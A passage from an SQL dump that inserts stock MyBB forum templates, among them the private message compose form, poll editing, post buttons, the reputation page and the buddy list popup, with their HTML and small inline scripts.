'private_send', '<html>\n<head>\n<title>{$lang->compose_pm}</title>\n{$headerinclude}\n<script type=\"text/javascript\" src=\"jscripts/usercp.js?ver=1600\"></script>\n</head>\n<body>\n{$header}\n<form action=\"private.php\" method=\"post\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$preview}\n{$send_errors}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->compose_pm}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\" width=\"200\"><strong>{$lang->compose_to}</strong>\n <script type=\"text/javascript\">\n <!--\n document.write(\'(<a href=\"#\" onclick=\"showBcc(); return false;\" title=\"{$lang->compose_bcc_show_title}\">{$lang->compose_bcc_show}<\\/a>)\');\n // -->\n </script>\n <br /><span class=\"smalltext\">{$lang->separate_names}{$buddy_select_to}</span></td>\n<td class=\"trow1\" valign=\"top\"><textarea name=\"to\" id=\"to\" rows=\"2\" cols=\"38\" tabindex=\"1\">{$to}</textarea>{$max_recipients}</td>\n</tr>\n<tr id=\"bcc_area\">\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->compose_bcc}</strong>{$buddy_select_bcc}</td>\n<td class=\"trow2\"><textarea name=\"bcc\" id=\"bcc\" rows=\"2\" cols=\"38\" tabindex=\"1\">{$bcc}</textarea></td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->compose_subject}</strong></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"3\" /></td>\n</tr>\n{$posticons}\n<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->compose_message}</strong>{$smilieinserter}</td>\n<td class=\"trow2\">\n<textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"4\">{$message}</textarea>\n{$codebuttons}\n</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->compose_options}</strong></td>\n<td class=\"trow1\"><span class=\"smalltext\">\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"options[signature]\" value=\"1\" tabindex=\"5\" {$optionschecked[\'signature\']} />{$lang->options_sig}</label><br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"options[disablesmilies]\" value=\"1\" tabindex=\"6\" {$optionschecked[\'disablesmilies\']} />{$lang->options_disable_smilies}</label><br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"options[savecopy]\" value=\"1\" tabindex=\"7\" {$optionschecked[\'savecopy\']} />{$lang->options_save_copy}</label><br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"options[readreceipt]\" value=\"1\" tabindex=\"8\" {$optionschecked[\'readreceipt\']} />{$lang->options_read_receipt}</label><br />\n</span></td>\n</tr>\n</table>\n<br />\n<input type=\"hidden\" name=\"action\" value=\"do_send\" />\n<input type=\"hidden\" name=\"pmid\" value=\"{$pmid}\" />\n<input type=\"hidden\" name=\"do\" value=\"{$do}\" />\n<div style=\"text-align: center;\">\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->send_message}\" tabindex=\"9\" accesskey=\"s\" />\n<input type=\"submit\" class=\"button\" name=\"saveasdraft\" value=\"{$lang->save_draft}\" tabindex=\"10\" />\n<input type=\"submit\" class=\"button\" name=\"preview\" value=\"{$lang->preview}\" tabindex=\"11\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n<script type=\"text/javascript\">\n<!--\n if($(\'bcc_area\') && $(\'bcc\').value == \"\")\n {\n $(\'bcc_area\').style.display = \'none\';\n }\n\n function showBcc()\n {\n if($(\'bcc_area\').style.display == \'none\')\n {\n $(\'bcc_area\').style.display = \'\';\n }\n else\n {\n $(\'bcc_area\').style.display = \'none\';\n }\n }\n// -->\n</script>\n{$autocompletejs}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('136', 'showthread_newreply_closed', '<a href=\"newreply.php?tid={$tid}\"><img src=\"{$theme[\'imglangdir\']}/closed.gif\" alt=\"{$lang->thread_closed}\" title=\"{$lang->thread_closed}\" /></a>&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('137', 'polls_editpoll', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_poll}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$preview}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->delete_poll}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"delete\" value=\"1\" tabindex=\"9\" /><strong>{$lang->delete_q}</strong></td>\n<td class=\"trow1\" width=\"100%\">{$lang->delete_note}<br /><span class=\"smalltext\">{$lang->delete_note2}</span></td>\n<td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_poll}\" tabindex=\"10\" /></td>\n</table>\n<input type=\"hidden\" name=\"action\" value=\"do_deletepoll\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n</form>\n<br />\n<form action=\"polls.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_poll}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\"><strong>{$lang->question}</strong></td>\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"question\" size=\"40\" maxlength=\"240\" value=\"{$question}\" /></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->num_options}</strong><br /><span class=\"smalltext\">{$lang->max_options} {$mybb->settings[\'maxpolloptions\']}</span></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"numoptions\" size=\"10\" value=\"{$numoptions}\" />&nbsp;&nbsp;<input type=\"submit\" class=\"button\" name=\"updateoptions\" value=\"{$lang->update_options}\" /></td>\n</tr>\n<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->poll_options}</strong></td>\n<td class=\"trow2\"><span class=\"smalltext\">{$lang->poll_options_note}</span>\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n{$optionbits}\n</table>\n</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->options}</strong></td>\n<td class=\"trow1\"><span class=\"smalltext\">\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[multiple]\" value=\"1\" {$postoptionschecked[\'multiple\']} />&nbsp;{$lang->option_multiple}</label><br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[public]\" value=\"1\" {$postoptionschecked[\'public\']} />&nbsp;{$lang->option_public}</label><br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[closed]\" value=\"1\" {$postoptionschecked[\'closed\']} />&nbsp;{$lang->option_closed}</label>\n</span>\n</td>\n</tr>\n<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->poll_timeout}</strong><br /><span class=\"smalltext\">{$lang->timeout_note}</span></td>\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"timeout\" value=\"{$timeout}\" /> {$lang->days_after} {$polldate}</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_poll}\" />\n</div>\n<input type=\"hidden\" name=\"action\" value=\"do_editpoll\" />\n<input type=\"hidden\" name=\"pid\" value=\"{$pid}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('138', 'forumbit_depth1_cat', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<thead>\n<tr>\n<td class=\"thead\" colspan=\"5\">\n<div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/{$expcolimage}\" id=\"cat_{$forum[\'fid\']}_img\" class=\"expander\" alt=\"{$expaltext}\" title=\"{$expaltext}\" /></div>\n<div><strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong><br /><div class=\"smalltext\">{$forum[\'description\']}</div></div>\n</td>\n</tr>\n</thead>\n<tbody style=\"{$expdisplay}\" id=\"cat_{$forum[\'fid\']}_e\">\n<tr>\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td>\n<td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td>\n<td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td>\n<td class=\"tcat\" width=\"200\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td>\n</tr>\n{$sub_forums}\n</tbody>\n</table>\n<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('139', 'postbit_edit', '<a href=\"editpost.php?pid={$post[\'pid\']}\" id=\"edit_post_{$post[\'pid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_edit.gif\" alt=\"{$lang->postbit_edit}\" title=\"{$lang->postbit_edit}\" /></a>\n<div id=\"edit_post_{$post[\'pid\']}_popup\" class=\"popup_menu\" style=\"display: none;\"><div class=\"popup_item_container\"><a href=\"javascript:;\" onclick=\"Thread.quickEdit({$post[\'pid\']});\" class=\"popup_item\">{$lang->postbit_quick_edit}</a></div><div class=\"popup_item_container\"><a href=\"editpost.php?pid={$post[\'pid\']}\" class=\"popup_item\">{$lang->postbit_full_edit}</a></div></div>\n<script type=\"text/javascript\">\n// <!--\n if(use_xmlhttprequest == \"1\")\n {\n new PopupMenu(\"edit_post_{$post[\'pid\']}\");\n }\n// -->\n</script>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('140', 'postbit_email', '<a href=\"member.php?action=emailuser&amp;uid={$post[\'uid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_email.gif\" alt=\"{$lang->postbit_email}\" title=\"{$lang->postbit_email}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('141', 'postbit_find', '<a href=\"search.php?action=finduser&amp;uid={$post[\'uid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_find.gif\" alt=\"{$lang->postbit_find}\" title=\"{$lang->postbit_find}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('142', 'postbit_pm', '<a href=\"private.php?action=send&amp;uid={$post[\'uid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_pm.gif\" alt=\"{$lang->postbit_pm}\" title=\"{$lang->postbit_pm}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('143', 'postbit_quickdelete', '<a href=\"editpost.php?pid={$post[\'pid\']}\" onclick=\"Thread.deletePost({$post[\'pid\']}); return false;\" style=\"display: none;\" id=\"quick_delete_{$post[\'pid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_delete.gif\" alt=\"{$lang->postbit_qdelete}\" title=\"{$lang->postbit_qdelete}\" /></a>\n<script type=\"text/javascript\">\n// <!--\n $(\'quick_delete_{$post[\'pid\']}\').style.display = \'\';\n// -->\n</script>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('144', 'postbit_quote', '<a href=\"newreply.php?tid={$tid}&amp;pid={$post[\'pid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_quote.gif\" alt=\"{$lang->postbit_quote}\" title=\"{$lang->postbit_quote}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('145', 'postbit_rep_button', '<a href=\"javascript:MyBB.reputation({$post[\'uid\']},{$post[\'pid\']});\"><img src=\"{$theme[\'imglangdir\']}/postbit_reputation.gif\" alt=\"{$lang->postbit_reputation_add}\" title=\"{$lang->postbit_reputation_add}\" /></a>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('146', 'postbit_report', '<a href=\"javascript:Thread.reportPost({$post[\'pid\']});\"><img src=\"{$theme[\'imglangdir\']}/postbit_report.gif\" alt=\"{$lang->postbit_report}\" title=\"{$lang->postbit_report}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('147', 'postbit_www', '<a href=\"{$post[\'website\']}\" target=\"_blank\"><img src=\"{$theme[\'imglangdir\']}/postbit_www.gif\" alt=\"{$lang->postbit_website}\" title=\"{$lang->postbit_website}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('148', 'polls_showresults_resultbit', '<tr>\n<td class=\"{$optionbg}\" align=\"right\">{$option}{$votestar}</td>\n<td class=\"{$optionbg}\" width=\"{$imagerowwidth}\"><img src=\"{$theme[\'imgdir\']}/pollbar-s.gif\" alt=\"\" /><img src=\"{$theme[\'imgdir\']}/pollbar.gif\" width=\"{$imagewidth}\" height=\"10\" alt=\"{$percent}%\" title=\"{$percent}%\" /><img src=\"{$theme[\'imgdir\']}/pollbar-e.gif\" alt=\"\" /><br />{$userlist}</td>\n<td class=\"{$optionbg}\" width=\"67\" align=\"center\">{$votes}</td>\n<td class=\"{$optionbg}\" width=\"67\" align=\"center\">{$percent}%</td>\n</tr>\n', '-2', '1402', '', '1339729416'); INSERT INTO mybb_templates VALUES('149', 'showthread_poll_resultbit', '<tr>\n<td class=\"{$optionbg}\" align=\"right\">{$option}{$votestar}</td>\n<td class=\"{$optionbg}\"><img src=\"{$theme[\'imgdir\']}/pollbar-s.gif\" alt=\"\" /><img src=\"{$theme[\'imgdir\']}/pollbar.gif\" width=\"{$imagewidth}\" height=\"10\" alt=\"{$percent}%\" title=\"{$percent}%\" /><img src=\"{$theme[\'imgdir\']}/pollbar-e.gif\" alt=\"\" /></td>\n<td class=\"{$optionbg}\" width=\"67\" align=\"center\">{$votes}</td>\n<td class=\"{$optionbg}\" width=\"67\" align=\"center\">{$percent}%</td>\n</tr>\n', '-2', '1402', '', '1339729416'); INSERT INTO mybb_templates VALUES('150', 'showteam_usergroup', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$usergroup[\'title\']}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->uname}</strong></span></td>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->email}</strong></span></td>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->pm}</strong></span></td>\n</tr>\n{$usergrouprows}\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('151', 'showteam_moderators', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"4\"><strong>{$lang->moderators}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->mod_username}</strong></span></td>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->mod_forums}</strong></span></td>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->mod_email}</strong></span></td>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->mod_pm}</strong></span></td>\n</tr>\n{$modrows}\n</table>\n<br/>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('152', 'showteam_moderators_mod', '<tr>\n<td width=\"50%\" class=\"trow1\"><a href=\"{$user[\'profilelink\']}\"><strong>{$user[\'username\']}</strong></a></td>\n<td width=\"30%\" class=\"trow2\"><span class=\"smalltext\">{$forumslist}</span></td>\n<td width=\"10%\" class=\"trow2\">{$emailcode}</td>\n<td width=\"10%\" class=\"trow1\">{$pmcode}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('153', 'report_noreason', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->report_post}</title>\n{$headerinclude}\n</head>\n<body>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\" align=\"center\">\n<br />\n<br />\n<strong>{$lang->report_error}</strong>\n<blockquote>{$lang->no_reason}</blockquote>\n<br /><br />\n<div>\n <script type=\"text/javascript\">\n <!--\n document.write(\'[<a href=\"javascript:history.go(-1);\">{$lang->go_back}</a>]\');\n document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\');\n // -->\n </script>\n</div>\n</td>\n</tr>\n</table>\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('154', 'reputation', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->reputation_report}</title>\n{$headerinclude}\n<script type=\"text/javascript\">\n<!--\n var delete_reputation_confirm = \"{$lang->delete_reputation_confirm}\";\n// -->\n</script>\n</head>\n<body>\n{$header}\n{$add_reputation}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\">\n<tr>\n <td class=\"thead\"><strong>{$lang->reputation_report}</strong></td>\n</tr>\n<tr>\n <td class=\"tcat\"><strong>{$lang->summary}</strong></td>\n</tr>\n<tr>\n <td class=\"trow1\">\n <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n <tr>\n <td>\n <span class=\"largetext\"><strong>{$username}</strong></span><br />\n <span class=\"smalltext\">\n ({$usertitle})<br />\n <br />\n <strong>{$lang->total_reputation}:</strong> <span class=\"repbox {$total_class}\">{$user[\'reputation\']}</span><br /><br />\n <strong>{$lang->reputation_members} {$rep_members}</strong><br />\n <strong>{$lang->reputation_posts} {$rep_posts}</strong><br />\n <strong class=\"reputation_positive\">{$lang->positive_count}:</strong> {$positive_count} {$pos_rep_info}<br />\n <strong class=\"reputation_neutral\">{$lang->neutral_count}:</strong> {$neutral_count} {$neu_rep_info}<br />\n <strong class=\"reputation_negative\">{$lang->negative_count}:</strong> {$negative_count} {$neg_rep_info}\n </span>\n </td>\n <td align=\"right\" style=\"width: 300px;\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder trow2\">\n <tr>\n <td>&nbsp;</td>\n <td><span class=\"smalltext reputation_positive\">{$lang->positive_count}</span></td>\n <td><span class=\"smalltext reputation_neutral\">{$lang->neutral_count}</span></td>\n <td><span class=\"smalltext reputation_negative\">{$lang->negative_count}</span></td>\n </tr>\n <tr>\n <td style=\"text-align: right;\"><span class=\"smalltext\">{$lang->last_week}</span></td>\n <td style=\"text-align: center;\"><span class=\"smalltext\">{$positive_week}</span></td>\n <td style=\"text-align: center;\"><span class=\"smalltext\">{$neutral_week}</span></td>\n <td style=\"text-align: center;\"><span class=\"smalltext\">{$negative_week}</span></td>\n </tr>\n <tr>\n <td style=\"text-align: right;\"><span class=\"smalltext\">{$lang->last_month}</span></td>\n <td style=\"text-align: center;\"><span class=\"smalltext\">{$positive_month}</span></td>\n <td style=\"text-align: center;\"><span class=\"smalltext\">{$neutral_month}</span></td>\n <td style=\"text-align: center;\"><span class=\"smalltext\">{$negative_month}</span></td>\n </tr>\n <tr>\n <td style=\"text-align: right;\"><span class=\"smalltext\">{$lang->last_6months}</span></td>\n <td style=\"text-align: center;\"><span class=\"smalltext\">{$positive_6months}</span></td>\n <td style=\"text-align: center;\"><span class=\"smalltext\">{$neutral_6months}</span></td>\n <td style=\"text-align: center;\"><span class=\"smalltext\">{$negative_6months}</span></td>\n </tr>\n </table>\n </td>\n </tr>\n </table>\n </td>\n</tr>\n<tr>\n <td class=\"tcat\"><strong>{$lang->comments}</strong></td>\n</tr>\n{$reputation_votes}\n<tr>\n <td class=\"tfoot\" align=\"right\">\n <form action=\"reputation.php\" method=\"get\">\n <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" />\n <select name=\"show\">\n <option value=\"all\" {$show_selected[\'all\']}>{$lang->show_all}</option>\n <option value=\"positive\" {$show_selected[\'positive\']}>{$lang->show_positive}</option>\n <option value=\"neutral\" {$show_selected[\'neutral\']}>{$lang->show_neutral}</option>\n <option value=\"negative\" {$show_selected[\'negative\']}>{$lang->show_negative}</option>\n </select>\n <select name=\"sort\">\n <option value=\"dateline\" {$sort_selected[\'last_updated\']}>{$lang->sort_updated}</option>\n <option value=\"username\" {$sort_selected[\'username\']}>{$lang->sort_username}</option>\n </select>\n {$gobutton}\n </form>\n </td>\n</tr>\n</table>\n{$multipage}\n{$footer}\n</body>\n</html>', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('155', 'misc_buddypopup', '<html>\n<head>\n<title>{$lang->buddy_list}</title>\n<meta http-equiv=\"refresh\" content=\"60; URL=misc.php?action=buddypopup\" />\n{$headerinclude}\n<style type=\"text/css\">\nbody {\n text-align: left;\n}\n\n.buddy_avatar {\n height: 50px;\n width: 50px;\n background: #fff;\n border: 1px solid #ccc;\n float: left;\n clear: left;\n margin-right: 5px;\n text-align: center;\n}\n\n.buddy_details img {\n vertical-align: middle;\n}\n\n.buddy_action {\n margin-left: 80px;\n}\n</style>\n</head>\n<body style=\"margin:0; padding: 4px; top: 0; left: 0;\">\n <table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\">\n <tr>\n <td class=\"thead\">\n <div class=\"float_right\" style=\"margin-top: 3px;\"><span class=\"smalltext\"><a href=\"#\" onclick=\"window.close();\">{$lang->close}</a></span></div>\n <div><strong>{$lang->buddy_list}</strong></div>\n </td>\n </tr>\n <tr>\n <td class=\"trow2\">\n <div style=\"overflow: auto; height: 300px;\">\n <table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\" style=\"border: 0;\">\n {$buddys[\'online\']}\n {$buddys[\'offline\']}\n </table>\n </div>\n </td>\n </tr>\n </table>\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('156', 'misc_buddypopup_user_offline', ' <tr>\n <td class=\"trow1\">\n <div class=\"buddy_avatar\"><img src=\"{$buddy[\'avatar\']}\" alt=\"\" width=\"{$scaled_dimensions[\'width\']}\" height=\"{$scaled_dimensions[\'height\']}\" style=\"margin-top: {$margin_top}px;\" /></div>\n <div class=\"buddy_details\">\n <img src=\"{$theme[\'imgdir\']}/buddy_offline.gif\" alt=\"{$lang->offline}\" title=\"{$lang->offline}\" /> {$profile_link}\n <div class=\"buddy_action\">\n <span class=\"smalltext\">{$last_active}<br />{$send_pm}</span>\n </div>\n </div>\n </td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('157', 'misc_buddypopup_user_online', ' <tr>\n <td class=\"trow1\">\n <div class=\"buddy_avatar\"><img src=\"{$buddy[\'avatar\']}\" alt=\"\" width=\"{$scaled_dimensions[\'width\']}\" height=\"{$scaled_dimensions[\'height\']}\" style=\"margin-top: {$margin_top}px;\" /></div>\n <div class=\"buddy_details\">\n <img src=\"{$theme[\'imgdir\']}/buddy_online.gif\" alt=\"{$lang->online}\" title=\"{$lang->online}\" /> {$profile_link}\n <div class=\"buddy_action\">\n <span class=\"smalltext\">{$last_active}<br />{$send_pm}</span>\n </div>\n </div>\n </td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('158', 'private_archive_txt', '{$lang->private_messages_for}\n({$lang->exported_date})\n\n{$pmsdownload}', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('159', 'postbit_avatar', '<a href=\"{$post[\'profilelink_plain\']}\"><img src=\"{$post[\'avatar\']}\" alt=\"\" {$avatar_width_height} /></a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('160', 'usercp_profile_customfield', '<tr>\n<td>\n<a title=\"{$profilefield[\'description\']}\" style=\"text-decoration: none;\">{$profilefield[\'name\']}</a>:\n<br />\n<span class=\"smalltext\">{$profilefield[\'description\']}</span>\n</td>\n</tr>\n<tr>\n<td>{$code}</td>\n</tr>\n', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('161', 'usercp_profile_profilefields', '<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->additional_information}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n{$customfields}\n</table>\n</fieldset>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('162', 'private_archive', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->archive_messages}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"private.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->archive_messages}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\">{$lang->archive_note}</span></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\" width=\"30%\"><strong>{$lang->folders}</strong></td>\n<td class=\"trow1\">{$folderlist}</td>\n</tr>\n<tr>\n<td class=\"trow2\" valign=\"top\" width=\"30%\"><strong>{$lang->date_limit}</strong></td>\n<td class=\"trow2\"><select name=\"dayway\"><option value=\"older\">{$lang->date_limit_older}</option><option value=\"newer\">{$lang->date_limit_newer}</option><option value=\"disregard\">{$lang->date_limit_disregard}</option></select> <input type=\"text\" class=\"textbox\" name=\"daycut\" value=\"30\" size=\"3\" maxlength=\"4\" /> {$lang->date_limit_days}</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\" width=\"30%\"><strong>{$lang->export_unread}</strong></td>\n<td class=\"trow1\"><input type=\"radio\" class=\"radio\" name=\"exportunread\" value=\"1\" /> {$lang->yes} <input type=\"radio\" class=\"radio\" name=\"exportunread\" value=\"0\" checked=\"checked\" /> {$lang->no} </td>\n</tr>\n<tr>\n<td class=\"trow2\" valign=\"top\" width=\"30%\"><strong>{$lang->delete_archived}</strong><br /><span class=\"smalltext\">{$lang->delete_archived_note}</span></td>\n<td class=\"trow2\"><input type=\"radio\" class=\"radio\" name=\"deletepms\" value=\"1\" /> {$lang->yes} <input type=\"radio\" class=\"radio\" name=\"deletepms\" value=\"0\" checked=\"checked\" /> {$lang->no} </td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\" width=\"30%\"><strong>{$lang->export_format}</strong><br /><span class=\"smalltext\">{$lang->export_format_note}</span></td>\n<td class=\"trow1\"><input type=\"radio\" class=\"radio\" name=\"exporttype\" value=\"html\" checked=\"checked\" /> {$lang->export_html}<br /><input type=\"radio\" class=\"radio\" name=\"exporttype\" value=\"txt\" /> {$lang->export_txt}<br /><input type=\"radio\" class=\"radio\" name=\"exporttype\" value=\"csv\" /> {$lang->export_csv}</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_export\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->archive_messages}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('163', 'private_folders_folder', '<tr>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"folder[{$fid}]\" size=\"25\" value=\"{$foldername}\" maxlength=\"30\" /></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('164', 'private_folders_folder_unremovable', '<tr>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"folder[{$fid}]\" size=\"25\" value=\"{$foldername}\" maxlength=\"30\" /> <span class=\"smalltext\">({$foldername2} - {$lang->cannot_be_removed})</span>\n</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('165', 'showteam_usergroup_user', '<tr>\n<td width=\"80%\" class=\"{$bgcolor}\"><a href=\"{$user[\'profilelink\']}\"><strong>{$user[\'username\']}</strong></a></td>\n<td width=\"10%\" class=\"{$bgcolor}\">{$emailcode}</td>\n<td width=\"10%\" class=\"{$bgcolor}\">{$pmcode}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('166', 'showteam_moderators_forum', '<a href=\"{$forum_url}\">{$forum[\'name\']}</a><br/>', 